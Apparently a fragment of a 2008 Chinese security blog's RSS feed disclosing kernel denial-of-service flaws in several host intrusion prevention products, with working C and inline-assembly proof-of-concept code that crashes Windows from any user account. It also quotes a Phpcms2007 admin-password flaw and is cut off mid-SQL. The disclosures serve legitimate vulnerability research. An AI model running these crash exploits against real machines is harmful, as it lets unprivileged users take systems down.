href=&quot;http://tlk.net.ru/tags/%25E9%25A3%259E%25E5%25A4%25A9%25E8%25AE%25BA%25E5%259D%259B/&quot; rel=&quot;tag&quot;&gt;飞天论坛&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%25B3%25A8%25E5%2585%25A5%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;注入漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=bb1a14d69427b8dd49243383be3d016f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=bb1a14d69427b8dd49243383be3d016f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7865ae1b98571636ba1bb1ae3d0a083f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7865ae1b98571636ba1bb1ae3d0a083f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=262bde75f2a93e06e696acc1f06ff083&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=262bde75f2a93e06e696acc1f06ff083&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=44a83581d0c3228d852c56b4a73424dd&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=44a83581d0c3228d852c56b4a73424dd&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=f22f993773ac46c665556456ba009f01&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=f22f993773ac46c665556456ba009f01&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=aeaa86129ec8c6d4f962036abe2228f4&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=aeaa86129ec8c6d4f962036abe2228f4&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=64d7a801106de1fc0ace983bb9383708&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=64d7a801106de1fc0ace983bb9383708&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Fri, 03 Oct 2008 16:22:01 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/Ftbbs-6-X-injection-exp/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/Ftbbs-6-X-injection-exp/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120659079/5165305</fs:itemid></item><item><title>Real-Time Defender 多处内核拒绝服务漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120505607/5165305/1/item.html</link><description>影响版本: Real-Time Defender&amp;nbsp;&amp;nbsp;v1.0 &lt;br/&gt;&lt;br/&gt;Real-time Defender Professional（简称RTD)是一款主机入侵防护系统。&lt;br/&gt;&lt;br/&gt;RTD的最新版本v1.0中存在多处内核拒绝服务漏洞，可导致任意权限用户在安装了RTD的系统上可引发蓝屏。&lt;br/&gt;&lt;br/&gt;出问题的组件：ProSecur.sys ,版本：1.1.1.0，CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8&lt;br/&gt;&lt;br/&gt;该问题同之前Malware defender的问题类似(&lt;a href=&quot;http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html&quot; target=&quot;_blank&quot;&gt;http://hi.baidu.com/mj0011/blog/item/464aad31aed4f7ae5fdf0e4f.html&lt;/a&gt;）RTD在很多SSDT HOOK函数中，对参数检查不够严格，就将参数传递给系统的 ZwXxx函数，结果引发蓝屏。&lt;br/&gt;&lt;br/&gt;示例函数：hk_ZwCreateKey&lt;br/&gt;&lt;br/&gt;偏移:0x21f56&lt;br/&gt;&lt;br/&gt;测试代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;WCHAR xx&amp;#91;&amp;#93; = L&amp;quot;xxxx_fuck_rtd&amp;quot;;&lt;br/&gt;&lt;br/&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwCreateKey&amp;quot;);&lt;br/&gt;&lt;br/&gt;OBJECT_ATTRIBUTES oba ;&lt;br/&gt;UNICODE_STRING strname ; &lt;br/&gt;strname.Buffer = xx; &lt;br/&gt;strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ; &lt;br/&gt;&lt;br/&gt;InitializeObjectAttributes(&amp;amp;oba , &amp;amp;strname ,0 , 0,(PVOID)0x80000000);&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;lea eax,oba&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;call p &lt;br/&gt;&amp;nbsp;&amp;nbsp; &lt;br/&gt;&amp;#125;&lt;br/&gt;&lt;br/&gt;return ;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;测试程序下载：&lt;a href=&quot;http://mj0011.ys168.com&quot; target=&quot;_blank&quot;&gt;http://mj0011.ys168.com&lt;/a&gt; 漏洞演示目录下BSOD_rtd.rar&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/real-time/&quot; rel=&quot;tag&quot;&gt;real-time&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/defender/&quot; rel=&quot;tag&quot;&gt;defender&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%25A4%259A%25E5%25A4%2584%25E5%2586%2585%25E6%25A0%25B8%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;多处内核拒绝服务漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=78ea572524a4b0b03bd07fe01656c056&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=78ea572524a4b0b03bd07fe01656c056&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=a1601f63a48eb94d7adad59776fdb67a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=a1601f63a48eb94d7adad59776fdb67a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=602316ed1827ed0e83f3c380d6a358bd&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=602316ed1827ed0e83f3c380d6a358bd&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=6669a89bbe3d671bd3a221416909ba5b&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=6669a89bbe3d671bd3a221416909ba5b&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=d291d0ff3f11b5c34fc687ac85bddae9&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=d291d0ff3f11b5c34fc687ac85bddae9&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c2b339303f9c6099b19d990687382e4d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c2b339303f9c6099b19d990687382e4d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=8699e8571746824c07d30b9601b6d8c9&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=8699e8571746824c07d30b9601b6d8c9&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 15:45:42 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/288/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/288/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120505607/5165305</fs:itemid></item><item><title>Malware Defender 多处内核拒绝服务漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473227/5165305/1/item.html</link><description>涉及版本 Malware Defender 1.1.3(2008-09-24)及以下版本&lt;br/&gt;&lt;br/&gt;Malware Defender(简称MD)是一个HIPS &amp; Anti-Rootkit工具。&lt;br/&gt;&lt;br/&gt;Malware Defender最新版本1.1.3(2008-09-24)的内核驱动存在多处内核拒绝服务漏洞，任意权限的用户在安装了MD可引发蓝屏 &lt;br/&gt;出问题的组件：mdcore.sys(安装后随机命名） 版本1.1.0.0 CheckSum = 0x0003C26C TimeStamp = 0x48d88131&lt;br/&gt;&lt;br/&gt;MD在对SSDT HOOK时，存在多处参数检查不全面，同时将可能有错的参数从内核模式传递给系统函数，从而引发系统蓝屏。&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;示例函数:ZwCreateKey&lt;br/&gt;&lt;br/&gt;函数ZwCreateKey的原型是：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;NTSTATUS&lt;br/&gt;NtCreateKey(&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__out PHANDLE KeyHandle,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in ACCESS_MASK DesiredAccess,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in POBJECT_ATTRIBUTES ObjectAttributes,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__reserved ULONG TitleIndex,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in_opt PUNICODE_STRING Class,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in ULONG CreateOptions,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__out_opt PULONG Disposition&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;)&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;其中ObjectAttrutes中的ObjectName , SecurityDescriptor和SecurityQualityOfService域都可以被用来进行缓存拒绝服务攻击.&lt;br/&gt;&lt;br/&gt;MD在其HOOK函数hk_ZwCreateKey中（偏移量：0xcd2e)，仅仅对ObjectName域做了有效性检查，判断是一个有效的注册表名，就直接调用ZwOpenKey函数，以传入的ObjectAttributes为参数。&lt;br/&gt;&lt;br/&gt;由于在MD的HOOK函数中已经经过中断调用，当前线程的上个模式是UserMode,此时调用ZwOpenKey,再经过一次KiSystemService,会导致系统将当前线程的上个模式改为KernelMode,这样系统函数ZwOpenKey将不会再对ObjectAttributes的所有参数做任何有效性检查，而是直接访问其地址，这样，如果我们传递进一个错误的内核地址的SecurityDescriptor，就会引发系统崩溃，蓝屏重启&lt;br/&gt;&lt;br/&gt;实际上在本例中，是经过这样一个调用过程最终蓝屏的ZwCreateKey -&gt; hk_ZwCreateKey -&gt; (检查了ObjectAttributes-&gt;ObjectName) -&gt; ZwOpenKey -&gt; 上个模式改为KernelMode,系统不检查参数有效性 -&gt;ObOpenObjectByName -&gt; ObpCaptureObjectCreateInformation -&gt; 系统函数判断SecurityDescriptor域存在，且上个模式为内核模式，因此不做参数检查,直接将参数 -&gt;SeCaptureSecurityDescriptor -&gt; SeCaptureSecurityDescriptor访问错误的SecurityDescriptor地址，系统崩溃蓝屏&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;测试代码：&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;&lt;br/&gt;HKEY hkey ;&lt;br/&gt;&lt;br/&gt;WCHAR xx&amp;#91;&amp;#93; = L&amp;quot;xxxx_fuck_malware_defender&amp;quot;;&lt;br/&gt;&lt;br/&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwCreateKey&amp;quot;);&lt;br/&gt;&lt;br/&gt;//获得ZwCreateKey地址&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;RegOpenKey(HKEY_LOCAL_MACHINE , &amp;quot;SOFTWARE&amp;#92;&amp;#92;&amp;quot; , &amp;amp;hkey);&lt;br/&gt;&lt;br/&gt;//随便用一个键句柄作为RootDirectory,以绕过MD的检查&lt;br/&gt;&lt;br/&gt;OBJECT_ATTRIBUTES oba ;&lt;br/&gt;UNICODE_STRING strname ; &lt;br/&gt;strname.Buffer = xx; &lt;br/&gt;strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ; &lt;br/&gt;&lt;br/&gt;InitializeObjectAttributes(&amp;amp;oba , &amp;amp;strname ,0 , hkey,(PVOID)0x80000000);&lt;br/&gt;&lt;br/&gt;//填充ObjectAttributes,使ObjectName有效，SecurityDescriptor填入无效的内核地址&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;IO_STATUS_BLOCK iosb ; &lt;br/&gt;HANDLE hfile ; &lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;lea eax,oba&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;call p &lt;br/&gt;&amp;nbsp;&amp;nbsp; &lt;br/&gt;&amp;#125;&lt;br/&gt;&lt;br/&gt;//调用&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;测试程序下载：&lt;a href=&quot;http://mj0011.ys168.com&quot; target=&quot;_blank&quot;&gt;http://mj0011.ys168.com&lt;/a&gt; 漏洞演示目录下 BSOD_MD.rar&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/malware/&quot; rel=&quot;tag&quot;&gt;malware&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/defender/&quot; rel=&quot;tag&quot;&gt;defender&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%25A4%259A%25E5%25A4%2584%25E5%2586%2585%25E6%25A0%25B8%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;多处内核拒绝服务漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=4acf2d1b62b15b56173d9680ffb42a52&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=4acf2d1b62b15b56173d9680ffb42a52&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=f14eef351ddff7b44c622dc192987617&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=f14eef351ddff7b44c622dc192987617&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=f0125ded3fd5012fc7abd012d36424be&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=f0125ded3fd5012fc7abd012d36424be&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=7eed39b93704f36af551966dbb4c0e0f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=7eed39b93704f36af551966dbb4c0e0f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=87383f1219603624df1e3bc64692c91f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=87383f1219603624df1e3bc64692c91f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0f341c9559deb29298d22dffec0e7ead&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0f341c9559deb29298d22dffec0e7ead&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=1262d0726fca44a58ce3158fff72e566&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=1262d0726fca44a58ce3158fff72e566&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:46:03 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/287/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/287/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473227/5165305</fs:itemid></item><item><title>中网S3主机安全系统 多处内核拒绝服务漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473228/5165305/1/item.html</link><description>涉及版本 中网S3主机安全系2008版本3.5.0.2及以下&lt;br/&gt;&lt;br/&gt;中网S3是一款号称4D &amp; 4M齐全的防火墙、HIDS/HIPS软件&lt;br/&gt;&lt;br/&gt;其最新版本3.5.0.2及以下所有版本的驱动程序存在多出内核拒绝服务漏洞，可使任何权限用户在安装了中网S3的系统上引发蓝屏&lt;br/&gt;&lt;br/&gt;出问题的组件(已验证版本)：NCFileMon.sys ,版本:5.2.3700.0(囧) , CheckSum = 0x00036d61,TimeStamp = 0x46f774e2&lt;br/&gt;&lt;br/&gt;驱动中对于SSDT部分函数的inline hook存在参数检查不严格的问题，用户态传入错误参数即可导致驱动出错，引发系统崩溃，蓝屏重启。&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;示例函数： hk_ZwOpenFile&lt;br/&gt;&lt;br/&gt;验证版本函数偏移量:0x97f6&lt;br/&gt;&lt;br/&gt;ZwOpenFile的原型是：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;NTSTATUS&lt;br/&gt;ZwOpenFile(&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__out PHANDLE FileHandle,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in ACCESS_MASK DesiredAccess,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in POBJECT_ATTRIBUTES ObjectAttributes,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__out PIO_STATUS_BLOCK IoStatusBlock,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in ULONG ShareAccess,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in ULONG OpenOptions&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;)&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;该HOOK函数对于第三个参数ObjectAttributes-&gt;ObjectName-&gt;Buffer未作有效性验证，只判断了是否为空。另外，由于该HOOK函数体内有结构化异常处理，但是该处理机制只对用户模式地址访问异常有效，因此我们构造错误的内核地址参数，即可引发蓝屏&lt;br/&gt;&lt;br/&gt;测试代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwOpenFile&amp;quot;);&lt;br/&gt;&lt;br/&gt;OBJECT_ATTRIBUTES oba ;&lt;br/&gt;UNICODE_STRING strname ; &lt;br/&gt;strname.Buffer = (PWSTR)0x80000000 ; &lt;br/&gt;&lt;br/&gt;oba.ObjectName = &amp;amp;strname ; &lt;br/&gt;&lt;br/&gt;IO_STATUS_BLOCK iosb ; &lt;br/&gt;HANDLE hfile ; &lt;br/&gt;&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax , iosb&lt;br/&gt;&amp;nbsp;&amp;nbsp; push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax,oba&lt;br/&gt;&amp;nbsp;&amp;nbsp; push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0x40000000 //set access mask to bypass S3 &amp;#039;s check&lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax,hfile&lt;br/&gt;&amp;nbsp;&amp;nbsp; push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp; call p &lt;br/&gt;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;用户态任意权限的程序运行此代码后，即可引发系统蓝屏重启&lt;br/&gt;&lt;br/&gt;测试程序下载：&lt;a href=&quot;http://mj0011.ys168.com&quot; target=&quot;_blank&quot;&gt;http://mj0011.ys168.com&lt;/a&gt; ,漏洞演示目录下 :BSOD_ncS3.rar&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;另外，S3中验证缓存有效性的方法存在一定问题，虽然较难由用户态主动触发，但有一定引发蓝屏的几率，另外，其校验方法也比正规的参数校验方法消耗更多的CPU时间，因此安装了中网S3主机安全系统的机器可能会有较大程度的非必要性能降低&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/%25E4%25B8%25AD%25E7%25BD%2591s3%25E4%25B8%25BB%25E6%259C%25BA%25E5%25AE%2589%25E5%2585%25A8%25E7%25B3%25BB%25E7%25BB%259F/&quot; rel=&quot;tag&quot;&gt;中网s3主机安全系统&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%25A4%259A%25E5%25A4%2584%25E5%2586%2585%25E6%25A0%25B8%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;多处内核拒绝服务漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=abd7b67882ec2a1ea752ca245f64db24&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=abd7b67882ec2a1ea752ca245f64db24&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=60dc1e5a853fda39b48ca6671e82a97a&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=60dc1e5a853fda39b48ca6671e82a97a&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=fece42f77057648067384d7e30e4f1b1&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=fece42f77057648067384d7e30e4f1b1&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=3410f8a0220dc5f4756c7ee7720ee33f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=3410f8a0220dc5f4756c7ee7720ee33f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=bf3d96aee143c89347eef67b1a25cd25&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=bf3d96aee143c89347eef67b1a25cd25&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=0b69349bd06bdc0a140a032097e28f05&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=0b69349bd06bdc0a140a032097e28f05&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=71fd61f325fd2c05ab1a27f1047f9b97&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=71fd61f325fd2c05ab1a27f1047f9b97&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:43:49 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/post/286/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/post/286/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473228/5165305</fs:itemid></item><item><title>Phpcms2007 更改管理员密码漏洞</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473229/5165305/1/item.html</link><description>这个漏洞没什么，可能利用上有点意思，简单说下思路：&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;$mod = $digg_mod;&lt;br/&gt;$digg_setting = cache_read(&amp;#039;digg_setting.php&amp;#039;);&lt;br/&gt;@extract($digg_setting);&lt;br/&gt;//包含了digg模块的配置文件，并执行了extract&lt;br/&gt;unset($digg_setting);&lt;br/&gt;if ($mod &amp;amp;&amp;amp; $id)&lt;br/&gt;//这里的$mod，$id是可以利用的&lt;br/&gt;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$table_end = $channelid == 0?&amp;#039;&amp;#039;:&amp;#039;_&amp;#039; . $channelid;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$table_name = $CONFIG&amp;#91;&amp;#039;tablepre&amp;#039;&amp;#93; . $mod . $table_end;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$mod_id = $mod . &amp;#039;id&amp;#039;;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;......&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$sql = &amp;quot;SELECT * FROM $table_name WHERE 